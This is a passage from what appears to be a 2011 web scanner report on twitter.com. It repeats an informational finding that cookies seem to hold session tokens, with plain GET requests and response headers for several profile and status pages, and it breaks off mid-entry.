The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/30442842241376256 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:40 GMT Server: hi Status: 200 OK X-Transaction: 1296224740-54021-29414 ETag: "c768dc702745a41fcbc487b93ba7b1d0" Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT X-Runtime: 0.05060 Content-Type: text/html; charset=utf-8 Content-Length: 13590 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQ0Mjg0MjI0MTM3NjI1NjoMY3NyZl9pZCIlMTdjZmE5ZGJlZjVk%250AM2JkM2I0YWIyZDA1MzE3NTdhYjE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--eff563544b6e766e02e277b4b06265fffbf2e5f3; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/30772839023910912 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:40 GMT Server: hi Status: 200 OK X-Transaction: 1296224740-93635-34868 ETag: "78f139df4c6b6f726d8cd49448048d35" Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT X-Runtime: 0.08978 Content-Type: text/html; charset=utf-8 Content-Length: 13741 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc3MjgzOTAyMzkxMDkxMjoMY3NyZl9pZCIlMzZjNjQyMjZiMjdi%250AYjEyMDg4ZmU0MGQ3MWFlM2M3M2I6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--31a7ec0c01289e70c33472c98a7cbc57bf724c53; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/30791740717801472 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:41 GMT Server: hi Status: 200 OK X-Transaction: 1296224740-47255-25269 ETag: "d4aa7ab8b414958eeafd252d48c7544d" Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT X-Runtime: 0.05744 Content-Type: text/html; charset=utf-8 Content-Length: 13835 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc5MTc0MDcxNzgwMTQ3MjoMY3NyZl9pZCIlM2ViNDhhMTdlMDQx%250AMTNkNjM4ZWNjZjJjNzM1YzRhNGI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--57098155f97d7c28fdd3d7868ba2f1b52affaed0; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mariamenounos HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:21 GMT Server: hi Status: 200 OK X-Transaction: 1296266001-12668-52676 ETag: "dfd5f78ed0c4ed8b98562bddfee9b7e2" Last-Modified: Sat, 29 Jan 2011 01:53:21 GMT X-Runtime: 0.01149 Content-Type: text/html; charset=utf-8 Content-Length: 49303 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mattbanks HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:20 GMT Server: hi Status: 200 OK X-Transaction: 1296225020-89730-48319 ETag: "ec0575d0afb2bf3f6fc09ae312d729c0" Last-Modified: Fri, 28 Jan 2011 14:30:20 GMT X-Runtime: 0.01604 Content-Type: text/html; charset=utf-8 Content-Length: 50027 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mattbanks/status/28168049634844672 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:24 GMT Server: hi Status: 200 OK X-Transaction: 1296225023-49309-63525 ETag: "2ac504ed19bb0d5737b54925ddf2dbee" Last-Modified: Fri, 28 Jan 2011 14:30:23 GMT X-Runtime: 0.06537 Content-Type: text/html; charset=utf-8 Content-Length: 13691 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWF0dGJhbmtz%250AL3N0YXR1cy8yODE2ODA0OTYzNDg0NDY3MjoMY3NyZl9pZCIlMjQzOTBlZDZh%250ANWJhODhmMzZjMTQyNDJjYTViZTE2Y2M6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6%250AB2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--345453cec4138598b9a08c29980df4c39c3aba90; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mennovanslooten HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:10 GMT Server: hi Status: 200 OK X-Transaction: 1296225070-8349-1627 ETag: "d5a74d3b21022a46e5228042d143d163" Last-Modified: Fri, 28 Jan 2011 14:31:10 GMT X-Runtime: 0.01281 Content-Type: text/html; charset=utf-8 Content-Length: 48347 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /messengerpost HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:43 GMT Server: hi Status: 200 OK X-Transaction: 1296225043-32375-15875 ETag: "e9683276160c0ad3462c344153ccbcdb" Last-Modified: Fri, 28 Jan 2011 14:30:43 GMT X-Runtime: 0.01196 Content-Type: text/html; charset=utf-8 Content-Length: 50655 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /miketaylr HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:15 GMT Server: hi Status: 200 OK X-Transaction: 1296225015-365-19064 ETag: "fe6b40f83a3db7f038fdf6a1c2da2712" Last-Modified: Fri, 28 Jan 2011 14:30:15 GMT X-Runtime: 0.01247 Content-Type: text/html; charset=utf-8 Content-Length: 50661 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /miketaylr/status/28450462860574722 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:15 GMT Server: hi Status: 200 OK X-Transaction: 1296225015-87669-41148 ETag: "0614e68a07b236446d991d175287ff76" Last-Modified: Fri, 28 Jan 2011 14:30:15 GMT X-Runtime: 0.06100 Content-Type: text/html; charset=utf-8 Content-Length: 13700 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWlrZXRheWxy%250AL3N0YXR1cy8yODQ1MDQ2Mjg2MDU3NDcyMjoMY3NyZl9pZCIlODgzNDE0MmFh%250AYjIxNmFlNTQzYjMzMTE1YjIwN2I2OTg6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--7486f8d612e6b798f03b8c042950cee765d57f1e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129622418451783185; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /moxiesoft HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:16:24 GMT Server: hi Status: 200 OK X-Transaction: 1296224184-1250-55880 ETag: "c8b3c0b1df873136d3d1cad3c8b419ff" Last-Modified: Fri, 28 Jan 2011 14:16:24 GMT X-Runtime: 0.01726 Content-Type: text/html; charset=utf-8 Content-Length: 51386 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296224183777646; path=/; expires=Fri, 04-Feb-11 14:16:23 GMT; domain=.twitter.com Set-Cookie: guest_id=129622418451783185; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTRmYjYzZDBkM2FhODQ0MWJmMjI2Y2RiMWRmZjM2NDlmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyGj7zC0B--83af79b56916b6955fc5a806bee986cc03de516e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlyjazz HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:40 GMT Server: hi Status: 200 OK X-Transaction: 1296224920-98437-32805 ETag: "a870c25d2bf45fd1f02dca10a6c09b7f" Last-Modified: Fri, 28 Jan 2011 14:28:40 GMT X-Runtime: 0.00899 Content-Type: text/html; charset=utf-8 Content-Length: 49524 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlyjazz/status/29924505002446849 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
